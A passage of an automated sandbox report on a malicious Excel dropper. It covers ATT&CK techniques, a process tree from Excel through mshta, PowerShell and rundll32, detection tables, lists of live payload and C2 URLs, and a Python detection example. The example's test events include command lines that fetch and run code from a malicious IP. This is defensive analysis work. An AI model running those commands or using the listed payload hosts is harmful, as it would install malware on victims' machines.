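On the page's data this pairs process 15's `1c0000.0.unpack` with the 0x40/MEM_PRIVATE dump at 0x1C0000, and process 10's `2820000.8.unpack` with its RWX dump at 0x2820000, while process 17's hit at 0x10001000 is a MEM_IMAGE region, i.e. a module mapped at the default DLL base 0x10000000 (the extracted `10000000.18.unpack`). Regions with protection 0x20 at a base ending in 1000 are the first section of such a mapped module.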
MITRE ATT&CK matrix: techniques with signature hits in this analysis, grouped by tactic (the report's matrix also shows the full technique template; only the cells carrying a hit count are listed here)

Initial Access: none
Execution: Scripting; Native API; Exploitation for Client Execution; Command and Scripting Interpreter; Service Execution; PowerShell
Persistence: Windows Service
Privilege Escalation: Windows Service; Process Injection
Defense Evasion: Disable or Modify Tools; Deobfuscate/Decode Files or Information; Scripting; Obfuscated Files or Information; Masquerading; Virtualization/Sandbox Evasion; Process Injection; Hidden Files and Directories; Rundll32
Credential Access: Input Capture
Discovery: System Time Discovery; File and Directory Discovery; System Information Discovery; Security Software Discovery; Virtualization/Sandbox Evasion; Process Discovery; Application Window Discovery; Remote System Discovery
Lateral Movement: none
Collection: Archive Collected Data; Email Collection; Input Capture; Clipboard Data
Exfiltration: none
Command and Control: Ingress Tool Transfer; Encrypted Channel; Non-Application Layer Protocol; Application Layer Protocol
Network Effects, Remote Service Effects, Impact: none
Behavior Graph ID: 562430
Sample: 364453688149503140239183.xls
Start date: 28/01/2022
Architecture: WINDOWS
Score: 100

Sample-level network contacts: 129.232.188.93 (xneeloZA, South Africa); 162.214.50.39 (UNIFIEDLAYER-AS-1US, United States); 43 other IPs or domains.
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 16 other signatures.

Process tree (numbers in brackets are the graph's per-process counters for created registry values and created files):

EXCEL.EXE [53, 12]
    dropped: C:\Users\...\364453688149503140239183.xls (Composite)
    signature: Obfuscated command line found
    -> cmd.exe
        -> mshta.exe [11]
            network: 91.240.118.168, ports 49165, 49166, 80 (GLOBALLAYERNL, unknown)
            -> powershell.exe [12, 7]
                network: ayoobeducationaltrust.in 139.59.58.214, ports 49167, 80 (DIGITALOCEAN-ASNUS, Singapore)
                dropped: C:\ProgramData\QWER.dll (PE32)
                signature: Powershell drops PE file
                -> cmd.exe
                    -> rundll32.exe
                        -> rundll32.exe [1]
                            dropped: C:\Windows\SysWOW64\...\cojfo.cqz (copy) (PE32)
                            signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                            -> rundll32.exe
                                -> rundll32.exe [1]
                                    signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                    -> rundll32.exe
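The behavior graph above records the delivery chain EXCEL.EXE -> cmd.exe -> mshta.exe -> powershell.exe -> cmd.exe -> rundll32.exe, with the payload DLL dropped to C:\ProgramData and re-launched through further rundll32.exe instances. The Python below is an added example, not from the report, of the process-ancestry checks behind the Sigma titles the report lists (Microsoft Office product spawning a Windows shell, MSHTA spawning a Windows shell, rundll32 loading from C:\ProgramData), run over process-creation events. The events, PIDs and command lines are constructed for the example: only the parent/child chain, the IP 91.240.118.168 and the two dropped-file paths come from the graph, the second path kept as truncated on the page, and the export name DllRegisterServer is a placeholder, not something the report shows.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-case image file name, e.g. "mshta.exe"
    cmdline: str


# Constructed process-creation events modelled on the behavior graph. The chain is the
# report's; PIDs, command lines and the DllRegisterServer export are invented for the example.
EVENTS = [
    ProcEvent(1000, 400, "excel.exe", 'EXCEL.EXE "C:\\Users\\user\\Desktop\\364453688149503140239183.xls"'),
    ProcEvent(1010, 1000, "cmd.exe", "cmd /c mshta http://91.240.118.168/"),
    ProcEvent(1020, 1010, "mshta.exe", "mshta http://91.240.118.168/"),
    ProcEvent(1030, 1020, "powershell.exe", "powershell -w hidden -enc <base64>"),
    ProcEvent(1040, 1030, "cmd.exe", "cmd /c rundll32 C:\\ProgramData\\QWER.dll,DllRegisterServer"),
    ProcEvent(1050, 1040, "rundll32.exe", "rundll32 C:\\ProgramData\\QWER.dll,DllRegisterServer"),
    # path kept as truncated in the report ("...")
    ProcEvent(1060, 1050, "rundll32.exe", "rundll32 C:\\Windows\\SysWOW64\\...\\cojfo.cqz,DllRegisterServer"),
    # benign control: a shell started from Explorer must not fire any rule
    ProcEvent(2000, 400, "explorer.exe", "explorer.exe"),
    ProcEvent(2010, 2000, "cmd.exe", "cmd /c dir"),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}


def build_index(events):
    return {e.pid: e for e in events}


def ancestors(index, event):
    """Walk the parent chain upwards; stops at an unknown parent or a PID cycle."""
    seen = set()
    cur = event
    while cur.ppid in index and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = index[cur.ppid]
        yield cur


def detect(events):
    """Return (pid, rule name) findings for the chain checks."""
    index = build_index(events)
    findings = []
    for ev in events:
        parent = index.get(ev.ppid)
        # direct parent/child rules, as in the Sigma titles the report lists
        if parent and parent.image in OFFICE_APPS and ev.image in SHELLS:
            findings.append((ev.pid, "office_spawns_shell"))
        if parent and parent.image == "mshta.exe" and ev.image in SHELLS:
            findings.append((ev.pid, "mshta_spawns_shell"))
        if ev.image in DLL_LOADERS and "\\programdata\\" in ev.cmdline.lower():
            findings.append((ev.pid, "dll_loaded_from_programdata"))
        # whole-chain rule: a DLL loader with an Office process anywhere in its ancestry,
        # which still fires for the later rundll32 instances that no longer reference ProgramData
        if ev.image in DLL_LOADERS and any(a.image in OFFICE_APPS for a in ancestors(index, ev)):
            findings.append((ev.pid, "dll_loader_descends_from_office"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The ancestry rule is the one worth keeping: the direct parent/child checks miss the deeper rundll32.exe instances in the graph (each is spawned by another rundll32.exe and the later ones load the renamed copy under SysWOW64), while a walk back to the Office root catches every process in the chain.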

Antivirus detection, initial sample
Source | Detection | Scanner | Label
364453688149503140239183.xls | 19% | ReversingLabs | Document-Excel.Trojan.Woreflint

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\ProgramData\QWER.dll | 100% | Joe Sandbox ML | -

Antivirus detection, unpacked PE files
Source | Detection | Scanner | Label
11.2.rundll32.exe.200000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.rundll32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.2520000.10.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.4b0000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
16.2.rundll32.exe.270000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.3020000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.2a0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.2850000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.380000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.2e90000.16.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.2820000.8.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.2860000.10.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.a30000.4.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.bd0000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.b80000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.a30000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.rundll32.exe.2a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.2f60000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.24f0000.9.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.2c90000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.2e40000.12.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.25e0000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.440000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.30b0000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.bd0000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.2dd0000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.ac0000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.2d00000.14.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.2e80000.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.b20000.6.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.a00000.5.unpack | 100% | Avira | HEUR/AGEN.1145233
9.2.rundll32.exe.340000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.26a0000.8.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.b50000.4.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.5a0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.2e60000.15.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.1e0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.cc0000.6.unpack | 100% | Avira | HEUR/AGEN.1145233
                            12.2.rundll32.exe.2fe0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.26d0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.210000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2e00000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.4e0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.840000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2c60000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.8f0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.170000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.b00000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e70000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.ae0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2910000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.350000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3a0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.bc0000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.27e0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2590000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2ec0000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.310000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.b50000.7.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2890000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.b10000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.470000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2f40000.12.unpack100%AviraHEUR/AGEN.1145233Download File
Source | Detection | Scanner | Label
ayoobeducationaltrust.in | 10% | Virustotal |
Source | Detection | Scanner | Label
http://91.240.118.168/vvv/ppp/fe.htmlWinSta0 | 100% | Avira URL Cloud | malware
http://91.240.118.168/vvv/ppp/fe | 100% | Avira URL Cloud | malware
http://cmit.valestudios.com/wp-admin/RueGJ41A/ | 13% | Virustotal |
http://cmit.valestudios.com/wp-admin/RueGJ41A/ | 100% | Avira URL Cloud | malware
http://sellin.ap | 0% | Avira URL Cloud | safe
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/ | 100% | Avira URL Cloud | phishing
http://91.240.118.168/vvv/ppp/fe.htmlv1.0 | 100% | Avira URL Cloud | malware
http://test.drea | 0% | Avira URL Cloud | safe
http://bawelnianka.cfolks.pl/wp-content/Ttv/ | 100% | Avira URL Cloud | phishing
http://91.240.11 | 0% | URL Reputation | safe
http://ayoobeducationaltrust.in | 100% | Avira URL Cloud | phishing
https://160.16.102.168:80/gYIhzpB | 0% | Avira URL Cloud | safe
http://huculek.f | 0% | Avira URL Cloud | safe
https://160.16.102.168:80/gYIhzpA | 0% | Avira URL Cloud | safe
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/ | 100% | Avira URL Cloud | malware
http://91.240.118.168/vvv/ppp/fe.pngPE3 | 100% | Avira URL Cloud | malware
http://cmit.valestudios.com/wp-a | 100% | Avira URL Cloud | malware
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3 | 100% | Avira URL Cloud | malware
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3 | 100% | Avira URL Cloud | malware
http://91.240.118.168/vvv/ppp/fe.htmlmshta | 100% | Avira URL Cloud | malware
http://test.valestudios.com/wp-c | 100% | Avira URL Cloud | malware
http://www.protware.com/ | 0% | URL Reputation | safe
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3 | 100% | Avira URL Cloud | phishing
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/ | 100% | Avira URL Cloud | malware
http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3 | 100% | Avira URL Cloud | malware
https://160.16.102.168:80/gYIhzp | 0% | Avira URL Cloud | safe
http://91.240.118.168/vvv/ppp/fe.png | 100% | Avira URL Cloud | malware
http://91.2 | 0% | Avira URL Cloud | safe
http://test.dreamcityorlando.com | 100% | Avira URL Cloud | malware
http://crm.compracasaenhouston.c | 0% | Avira URL Cloud | safe
http://91.240.118.168/vvv/ppp/fe.htmlC: | 100% | Avira URL Cloud | malware
http://curvygirlsboutique.com/jf | 100% | Avira URL Cloud | malware
http://91.240.118.168/vvv/ppp/fe.html3 | 100% | Avira URL Cloud | malware
http://test.vale | 0% | Avira URL Cloud | safe
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3 | 100% | Avira URL Cloud | malware
http://crm.compr | 0% | Avira URL Cloud | safe
http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3 | 100% | Avira URL Cloud | phishing
http://lynsmithgroup.com/hftm2i2 | 0% | Avira URL Cloud | safe
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/ | 100% | Avira URL Cloud | malware
http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html | 100% | Avira URL Cloud | malware
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/ | 100% | Avira URL Cloud | phishing
http://www.protware.com | 0% | URL Reputation | safe
http://91.240.118.168 | 100% | URL Reputation | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ayoobeducationaltrust.in | 139.59.58.214 | true | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/vvv/ppp/fe.png | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/vvv/ppp/fe.html | true |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://91.240.118.168/vvv/ppp/fe.htmlWinSta0 | mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/vvv/ppp/fe | powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://cmit.valestudios.com/wp-admin/RueGJ41A/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | 13%, Virustotal; Avira URL Cloud: malware | unknown
http://sellin.ap | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://91.240.118.168/vvv/ppp/fe.htmlv1.0 | mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://test.drea | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://bawelnianka.cfolks.pl/wp-content/Ttv/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://91.240.11 | powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | low
http://ayoobeducationaltrust.in | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://160.16.102.168:80/gYIhzpB | rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://huculek.f | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://160.16.102.168:80/gYIhzpA | rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.240.118.168/vvv/ppp/fe.pngPE3 | powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://cmit.valestudios.com/wp-a | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/vvv/ppp/fe.htmlmshta | mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://test.valestudios.com/wp-c | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.protware.com/ | mshta.exe, 00000004.00000003.424245582.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449466418.0000000003EAB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424110567.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424721967.0000000003407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.444232743.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449284684.000000000340B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449350682.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425017595.0000000003408000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://160.16.102.168:80/gYIhzp | rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.2 | 364453688149503140239183.xls.0.dr | true | Avira URL Cloud: safe | low
http://test.dreamcityorlando.com | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crm.compracasaenhouston.c | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://91.240.118.168/vvv/ppp/fe.htmlC: | mshta.exe, 00000004.00000002.448978311.0000000000598000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://curvygirlsboutique.com/jf | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/vvv/ppp/fe.html3 | mshta.exe, 00000004.00000003.447334668.0000000000536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447356395.000000000053E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448911645.0000000000542000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://test.vale | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crm.compr | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://lynsmithgroup.com/hftm2i2 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html | mshta.exe, 00000004.00000003.426086113.0000000003205000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://160.16.102.168:80/gYIhzpz | rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://sellin.app/wp-admin/S2cDPYXNKEnT/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://test.dreamcityorlando.com/t0mmx/xBBXi/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true |  | unknown
http://www.protware.com | mshta.exe, 00000004.00000003.424599420.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447384053.00000000033C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://sellin.app/wp-admin/S2cDP | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://cmit.valestudios.com/wp-admin/RueGJ41A/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true |  | unknown
https://160.16.102.168:80/gYIhzpK | rundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://cmit.vale | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://160.16.102.168:80/gYIhzpH | rundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://91.240.118.168/vvv/ppp/fe.html17 | mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmp | true |  | unknown
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true |  | unknown
http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://91.240.118.168 | powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://thesocialagent.net/b/MO5A | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://ayoobeducationaltrust.in/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true |  | unknown
http://bawelnianka.cfolks.pl/wp- | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://huculek.futurehost.pl/ima | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/ | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://test.dreamcityorlando.com/t0mmx/xBBXi/PE3 | powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmp | true |  | unknown
http://91.240.118.168/vvv/ppp/fe.htmlfunction | mshta.exe, 00000004.00000003.426307315.000000000320D000.00000004.00000800.00020000.00000000.sdmp | true |  | unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          195.154.133.20
                                                                          unknownFrance
                                                                          12876OnlineSASFRtrue
                                                                          185.157.82.211
                                                                          unknownPoland
                                                                          42927S-NET-ASPLtrue
                                                                          212.237.17.99
                                                                          unknownItaly
                                                                          31034ARUBA-ASNITtrue
                                                                          79.172.212.216
                                                                          unknownHungary
                                                                          61998SZERVERPLEXHUtrue
                                                                          110.232.117.186
